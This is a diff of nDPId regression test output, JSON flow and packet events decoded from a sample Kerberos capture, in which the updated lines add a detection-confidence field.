+00723{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930192,"flow_last_seen":1549337930193,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"ts_msec":1549337930193,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"ts_msec":1549337930214,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00875{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1549337930214,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"ts_msec":1549337930214,"pkt":"pB9ywglqAAgCHEeuCABFAAFnAFNAAIAGkEysEAjJrBAICMAPAFhOqMfQDl0Bb1AYAQBFdgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4T+8E3pUi7h1ZsZOoIXjjwvAQAgQGpJXHn0jgIAIbXQei+GxBZQViNO7UVdhzj5KUys1PXrvG2C8wEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLam9obnNvbi1wYySiEBsOSEFQUFlDUkFGVC5PUkejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIETocdNKgVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="}
-00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"ts_msec":1549337930214,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
+00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"ts_msec":1549337930214,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
 00598{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1549337930214,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"ts_msec":1549337930214,"pkt":"AAgCHEeupB9ywglqCABFAACYE0tAAIAGfiOsEAgIrBAIyQBYwA8OXQcjTqjJD1AYAQBZNwAAQBgDyB6VZPxID+fu9kcivDlP7463Dy1IfrYrHVzuJLB3P27gpkccW43Mtu3NrktwKAyme0Z0QNo0JvH3ppwCLvPborHS7i5Jp9I5pxLf5LZX6AlmVea2udQa4ufUWkijqzhrShLiqrevOUKPGzj2OQ=="}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7440000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"ts_msec":1549337930217,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1549337930217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1549337930217,"pkt":"pB9ywglqAAgCHEeuCABFAADBAFlAAIAGkOysEAjJrBAICMAQAFhuA\/SQrSTVxVAYAQACWAAAqoGWMIGToAMCARKigYsEgYhFQhzXcnmj64Ly0uBtjkMUoTuM+x\/rpAOTUWDkUHAspBDcB8geScaOnqOyTgnIEt9ORSbyaLGh7aDpqWoX8LkoU9AsGNn4U6LRjikWi59PfjQn46P9BY0tn6JOEZn\/IKW+bzyhJYK72MU5dfE\/Y9v1QP4pOcMGsyTXEkOUPDq6y5KpwHUNPs1e"}
@@ -47,9 +49,9 @@
 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1549337931199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"ts_msec":1549337931199,"pkt":"AAgCHEeupB9ywglqCABFAABsE2VAAIAGfjWsEAgIrBAIyQBYwBJewuYoJDXRkVAYAQBPlQAA7mWAsz4LwR11oOSQ27Ex06YGG2bAP8ttVVXtAwxS755lCHRg4mUkpOjXnBJJ8KdHDkkp7LWBSVTLf+j0wkJ4hFVjx0c="}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931210,"flow_last_seen":1549337931210,"flow_idle_time":7440000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":1432,"midstream":1,"ts_msec":1549337931210,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 02390{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1549337931210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1486,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1486,"pkt_l4_len":1452,"ts_msec":1549337931210,"pkt":"pB9ywglqAAgCHEeuCABFAAXAAHpAAIAGi8ysEAjJrBAICMATAFio5J72SB155lAYAQAvgAAAAAAFlGyCBZAwggWMoQMCAQWiAwIBDKOCBQcwggUDMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1hKWdXqL0IxSnZlxRjhHmIFUVS3rvb7i9fEBKrEJ5PVjDXxsAQeDmTL9wweNNg1pCQDRmZ6AE\/m2Y7TGJV\/FdJF\/GLAs\/UE5nC+H+eLE4iuLtnFkH3govXIWXOdlEsqQhROyd4qj2WtH7bxyzZwdtdBzD8HNk\/Zyhfmgmp+oA1+8nXeYYFDFKmqTt9a00HvvmTpJfi0pguIgxY8KmJbF4d1RUkWNuXZ5g7FA43R8i0OyHjh+mwSGoE1gJ\/X8DroluAfskaOHhGVguFx+famY4o8UsY6g4BojHiLERbIlzMsUYRq\/EQf2FuSw8Wc3swODADnnHqoAdpFJG5\/GMQbUUUhsHy5eDXa3\/EPT1ZKqI0bJsr7jOF5G9ytS8thT6E7bOOCcOFN4JNFsCA3bCyRL6jYH2ZedtZMr5yCI40ePAHAaIBbEPTKYDMpCUKxXExG41vrN6dY4CEFLw2Tb4BDinhxjESAIpIw6LOtdRzBrkjiFKjPEj4UBorlhX90DmWgF5dFJbZXz5eOVcZ\/qmOnm8JcuVim8byzO3C2W5go47U+8GNRvk\/iuaoCs18MAuzn4DOtJmgk1eSuxxL9sUZmjkqejNSB6Ny8aYGysoT\/tUR2mS\/10DyxEUb\/M23KvW\/d0nkBg7qCjWXvlLjMDmACl3rd8MXcyqYWqmZcwKWLk5yL3YiZbL90SxemnQHTIY+DWavybHj9SrM5+aINDzqHcDq0aHAhhwNPUOQQH+m0ab759iCYVNaTyITpTWuG6hneFvKoU9d3uSafxpBU5TJfC9PTmhW+\/db+6ouEM0JlNTrwSmfDpaJJPc+gkzn45Pl5k\/7+Abb+s6rWMNfHT+Em3MBbZJYdM0UlQ1xrel8YuJnwOOGyF4x2puehNGP\/\/\/ouwl65KT\/CBdxNVmhdbElBMgwiINySCK0GaA0G8iJuo2p3q21Z3q6PwC\/TBFuSNBvRRaLYdHeXUMMCTZUjjLBHDUqLGGPYiG40kPfZcBzP2U1v\/9gWBK4kWlSfWhwHwDob09dR24nAmYkaTEvrRnFvLOPKhepgPz5FiL+TNVO0x7Q9MEcpXED6nxJ9fgUpL+5AL+5zKjvBqGhTBSFztV5n2jwS9BN5nwKGyQXNwz7M3IugClC01JUeDu8ccEtCesL+sdsbL1EP7jcFCC1EniPRKxntY82esVy8lyQlrXBxmBdMcKVUa21imq65LZV0MJEQvFPcKWd3cpqWETjO2y3rGD5HXk8dwPDck3LvUU56PaEiLP3SNlqGRnDfEXoiRxz6YMXMhdwJMRbqAQJYa71fsqMLgQ4u3s5WkgZwwgZmgAwIBEqKBkQSBjkBvFbBksZRBZsgqvT9rWZWIMz104YLf86+Cksa0ZMsEGJ\/RDcCZOr8kPQRKlwzkm2uQjqkaOemu4sYhWXYr71KrOEs2JUveeWW4HHkLaYXd0a2yOtTAVV1zR76rPVw3Om2DZiy3OdOJiQuRn3tY6sCbzkX\/gKz0r0nI8miItgy4uzP0Z9rEEUiiCUR\/XkOkdTBzoAcDBQBAgQAAohAbDkhBUFBZQ1JBRlQuT1JHoycwJaADAgEKoR4wHBsaam9obnNvbi1wYyRASEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE44sbqoEjAQAgESAgERAgEXAgEYAgL\/eQ=="}
-00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931210,"flow_last_seen":1549337931210,"flow_idle_time":7440000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":1432,"midstream":1,"ts_msec":1549337931210,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}}
+00710{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931210,"flow_last_seen":1549337931210,"flow_idle_time":7440000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":1432,"midstream":1,"ts_msec":1549337931210,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}}
 02411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"ts_msec":1549337931211,"pkt":"AAgCHEeupB9ywglqCABFAAXUE2tAAIAGeMesEAgIrBAIyQBYwBNIHXnmqOSkjlAYAQDmlQAAAAAFqG2CBaQwggWgoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIEOGGCBDQwggQwoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiJzAloAMCAQqhHjAcGxpqb2huc29uLXBjJEBIQVBQWUNSQUZULk9SR6OCA+wwggPooAMCARKhAwIBAaKCA9oEggPWM37115K3Hp8wZkASHyq+pZzCB52w4ZkoKvxkfuUu0LiaHFeH\/YmBkYuC+Y2vHUb50xj2RvlJ0VUIhZ76+RSlQ21W8ccYNaNUXAdabNdF58x1VLmlxuTxbWyuhApe3nart0yE2ggJlqq+SXunnCj4pybyo3D5UqYJsd2CPwW\/UrYMlNJN1gTQgtBaL+rVhNBO6KW9AYxQ1t3V4\/aN5W98Rm9mtqvqy8JlwwSbsqtA+fkgyuLhaFI64sFXeg2okoVY+WpiV8y69YH3VrH9iOYXgjNBApUv8XW3Inwsdd+FJTBLBvDWG4tGHW9DGxqpa+jzaFQyiDi46S1MFPNG5ax\/fXZRFVyIKm5Uvcg+IVoFoTv79M+o2izKZu3xW5GT3jmX5joC1Jz2cBBvfj31IPUawr97kChTt3baVrRO5jtj4Qe\/Yf9D1ea6AnOL3m9lXfbWlkiRMtogdbiLBmz40fY6y7s2fBoNzUM7PPtzjMCZD+mzFnuxbn6SKFsq1jRXr1gfhz99U\/sj4rpgf0fGzuAji6\/CldJydoJ3ZF35EbOHxlT67B0T5Wdz2DSGMxMFnFTU2y41IZZAFsQkozjJDlJyV\/H3UNEgpsuzFWCdn70SJWivzXQmU387\/5qoLQgDt1DzqhRxVq84eAlKWowli8llAVqtdeTmpgPePJrGuN8afpBvekjwt\/1CNWyg0EdZHQFfl1jlAEsgIyCski92E8xu8mvOhuDWTPYemtkOSb2FcxtoxHDyT\/GouX7ARs1ZykSB8j3R9t9ImA7xedyZ34sFfJFGRcLyx6qpTKqFmVZRuxhX4QxBOD\/ubH8xUJ\/p2KhM0jR1yUcK5cyCfymWcxTybrHYNySjaI0gUlhRAiWvZM8bRaCC8Fvoak+VMcqFAYw\/ve5dkR7KuJ\/TxqmhnlpwuoDkayoCpyiqZLALWWLzMuA+erM0osdjgnLPkazewgaOuGK+L14eoN40NcSEI4LVjIf3MizcDep1bu4x++f34uKnDRQCxEnEkfmry2Kt7UmB9dRWUyMnIhre\/LcHyWzVYKmQzK4jbAZGQz3E7SgAtaF8YpuFzK+wN7Al3\/bnw+mNGEv8UnWesnu6eYSeTafPkSExr0eHjyMGHylq1SYGRDikN47BEUJ9DRohxwo4GIbZJ4SlXZm2o1CyYrdjxESgLw7oBxv5ojM77+mqWLxxRYcXrNOO62jI7OC10ISrQjw9VRI73l6ie75xGP23mwgzTkWksp2AmXFXEibjsoWoxN\/dqkJ1paHMQ4D49jni4b2qEd7LE7wiCkMzEEz1wgpM028xFWhhGKaCASowggEmoAMCARKiggEdBIIBGXjHjK5feQ4HY+O2QW1CcrS7y98xjbx4G5\/F1UdYW0nRFrJ1ea7DBhGVKjGhvpNRa\/suoiAGgMaTxIusGGUQaAV3QBkZHI2P7w3S90dRv87TwzBiyLZFov6Iyju+rGIOEBeNij1u4+ieA37sl1WxkkeY5PDSqYQ0xi5dzSQDh1ZKJZF1swmboJUdCNAO5zs9II914vVd0a+gpHqPPfi\/aa\/2ENYesIfYc445XBAksieN4OCiUuXDZetEyUARPhuFnigdmrFcLiKa7lrUb+XOxw\/TpGzrNeFBj3QXNS06SOOdTL3pwlP77\/SR+78shwDam4sOlgv2UEV2H31TfNEKJs\/OC4Ks1WD8+3srLETa3NVngdje5im6AaSi"}
-00702{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931210,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2884,"flow_avg_l4_payload_len":1442,"midstream":1,"ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
+00728{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931210,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2884,"flow_avg_l4_payload_len":1442,"midstream":1,"ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931211,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"flow_min_l4_payload_len":1064,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1064,"flow_avg_l4_payload_len":1064,"midstream":1,"ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1118,"pkt_l4_len":1084,"ts_msec":1549337931211,"pkt":"pB9ywglqAAgCHEeuCABFAARQAIFAAIAGjTWsEAjJrBAICMAVAFjnnRKZiyMmn1AYAQD\/uwAADkhBUFBZQ1JBRlQuT1JHoicwJaADAgEKoR4wHBsaam9obnNvbi1wYyRASEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQGiggPaBIID1jN+9deStx6fMGZAEh8qvqWcwgedsOGZKCr8ZH7lLtC4mhxXh\/2JgZGLgvmNrx1G+dMY9kb5SdFVCIWe+vkUpUNtVvHHGDWjVFwHWmzXRefMdVS5pcbk8W1sroQKXt52q7dMhNoICZaqvkl7p5wo+Kcm8qNw+VKmCbHdgj8Fv1K2DJTSTdYE0ILQWi\/q1YTQTuilvQGMUNbd1eP2jeVvfEZvZrar6svCZcMEm7KrQPn5IMri4WhSOuLBV3oNqJKFWPlqYlfMuvWB91ax\/YjmF4IzQQKVL\/F1tyJ8LHXfhSUwSwbw1huLRh1vQxsaqWvo82hUMog4uOktTBTzRuWsf312URVciCpuVL3IPiFaBaE7+\/TPqNosymbt8VuRk945l+Y6AtSc9nAQb3499SD1GsK\/e5AoU7d22la0TuY7Y+EHv2H\/Q9XmugJzi95vZV321pZIkTLaIHW4iwZs+NH2Osu7NnwaDc1DOzz7c4zAmQ\/psxZ7sW5+kihbKtY0V69YH4c\/fVP7I+K6YH9Hxs7gI4uvwpXScnaCd2Rd+RGzh8ZU+uwdE+Vnc9g0hjMTBZxU1NsuNSGWQBbEJKM4yQ5Sclfx91DRIKbLsxVgnZ+9EiVor810JlN\/O\/+aqC0IA7dQ86oUcVavOHgJSlqMJYvJZQFarXXk5qYD3jyaxrjfGn6Qb3pI8Lf9QjVsoNBHWR0BX5dY5QBLICMgrJIvdhPMbvJrzobg1kz2HprZDkm9hXMbaMRw8k\/xqLl+wEbNWcpEgfI90fbfSJgO8Xncmd+LBXyRRkXC8seqqUyqhZlWUbsYV+EMQTg\/7mx\/MVCf6dioTNI0dclHCuXMgn8plnMU8m6x2Dcko2iNIFJYUQIlr2TPG0WggvBb6GpPlTHKhQGMP73uXZEeyrif08apoZ5acLqA5GsqAqcoqmSwC1li8zLgPnqzNKLHY4Jyz5Gs3sIGjrhivi9eHqDeNDXEhCOC1YyH9zIs3A3qdW7uMfvn9+Lipw0UAsRJxJH5q8tire1JgfXUVlMjJyIa3vy3B8ls1WCpkMyuI2wGRkM9xO0oALWhfGKbhcyvsDewJd\/258PpjRhL\/FJ1nrJ7unmEnk2nz5EhMa9Hh48jBh8patUmBkQ4pDeOwRFCfQ0aIccKOBiG2SeEpV2ZtqNQsmK3Y8REoC8O6Acb+aIzO+\/pqli8cUWHF6zTjutoyOzgtdCEq0I8PVUSO95eonu+cRj9t5sIM05FpLKdgJlxVxIm47KFqMTf3apCdaWhzEOA+PY54uG9qhHeyxO8IgpDMxBM9cIKTNNvMRVoYRg="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931211,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"flow_min_l4_payload_len":242,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":242,"midstream":1,"ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49172,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -61,9 +63,9 @@
 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"ts_msec":1549337931219,"pkt":"AAgCHEeupB9ywglqCABFAACbE31AAIAGfe6sEAgIrBAIyQBYwBcKhDl3bkbwtVAYAQD\/bQAAzmwvcX+5XppDtJZXr9PwDYLsp98Hk08TTktA1oPPxQHxyFPFFH6C9d30u8d8saioSDapQyKHHyGt004ct60erCJP9bUby12IBGHwYva7Ha2y2bxZxEn3nV+8BQON\/a2dluoxZFHPI4urPpSWS9H8dnzG6Q=="}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931219,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"ts_msec":1549337931219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 02389{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1485,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1485,"pkt_l4_len":1451,"ts_msec":1549337931219,"pkt":"pB9ywglqAAgCHEeuCABFAAW\/AJNAAIAGi7SsEAjJrBAICMAYAFg1TYdzLuLg4VAYAQBQtwAAAAAFk2yCBY8wggWLoQMCAQWiAwIBDKOCBRcwggUTMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1hKWdXqL0IxSnZlxRjhHmIFUVS3rvb7i9fEBKrEJ5PVjDXxsAQeDmTL9wweNNg1pCQDRmZ6AE\/m2Y7TGJV\/FdJF\/GLAs\/UE5nC+H+eLE4iuLtnFkH3govXIWXOdlEsqQhROyd4qj2WtH7bxyzZwdtdBzD8HNk\/Zyhfmgmp+oA1+8nXeYYFDFKmqTt9a00HvvmTpJfi0pguIgxY8KmJbF4d1RUkWNuXZ5g7FA43R8i0OyHjh+mwSGoE1gJ\/X8DroluAfskaOHhGVguFx+famY4o8UsY6g4BojHiLERbIlzMsUYRq\/EQf2FuSw8Wc3swODADnnHqoAdpFJG5\/GMQbUUUhsHy5eDXa3\/EPT1ZKqI0bJsr7jOF5G9ytS8thT6E7bOOCcOFN4JNFsCA3bCyRL6jYH2ZedtZMr5yCI40ePAHAaIBbEPTKYDMpCUKxXExG41vrN6dY4CEFLw2Tb4BDinhxjESAIpIw6LOtdRzBrkjiFKjPEj4UBorlhX90DmWgF5dFJbZXz5eOVcZ\/qmOnm8JcuVim8byzO3C2W5go47U+8GNRvk\/iuaoCs18MAuzn4DOtJmgk1eSuxxL9sUZmjkqejNSB6Ny8aYGysoT\/tUR2mS\/10DyxEUb\/M23KvW\/d0nkBg7qCjWXvlLjMDmACl3rd8MXcyqYWqmZcwKWLk5yL3YiZbL90SxemnQHTIY+DWavybHj9SrM5+aINDzqHcDq0aHAhhwNPUOQQH+m0ab759iCYVNaTyITpTWuG6hneFvKoU9d3uSafxpBU5TJfC9PTmhW+\/db+6ouEM0JlNTrwSmfDpaJJPc+gkzn45Pl5k\/7+Abb+s6rWMNfHT+Em3MBbZJYdM0UlQ1xrel8YuJnwOOGyF4x2puehNGP\/\/\/ouwl65KT\/CBdxNVmhdbElBMgwiINySCK0GaA0G8iJuo2p3q21Z3q6PwC\/TBFuSNBvRRaLYdHeXUMMCTZUjjLBHDUqLGGPYiG40kPfZcBzP2U1v\/9gWBK4kWlSfWhwHwDob09dR24nAmYkaTEvrRnFvLOPKhepgPz5FiL+TNVO0x7Q9MEcpXED6nxJ9fgUpL+5AL+5zKjvBqGhTBSFztV5n2jwS9BN5nwKGyQXNwz7M3IugClC01JUeDu8ccEtCesL+sdsbL1EP7jcFCC1EniPRKxntY82esVy8lyQlrXBxmBdMcKVUa21imq65LZV0MJEQvFPcKWd3cpqWETjO2y3rGD5HXk8dwPDck3LvUU56PaEiLP3SNlqGRnDfEXoiRxz6YMXMhdwJMRbqAQJYa71fsqMLgQ4u3s5WkgZwwgZmgAwIBEqKBkQSBjoWrS7jR3\/ZxrmkklAr5M\/UVPgZBz\/I0MBRDSrLAPTWRtuq1ZhbBTvDmh4JfIoeW\/NN+j\/BIs99fVl1IARv5kJzlvsrT0oz2PdU+R8Rl10wOzwJfT7yBOJecNjJCW1XhiL9p6LojffFaim+4jvn\/X89SbhRBqPbpCCF+yHmow+h4iZkD+HM6Jz3YsaIdiuQwDqEEAgIApaIGBAQfAAAApGQwYqAHAwUAYIEAEKIQGw5IQVBQWUNSQUZULk9SR6MjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE44s3moBTADAgES"}
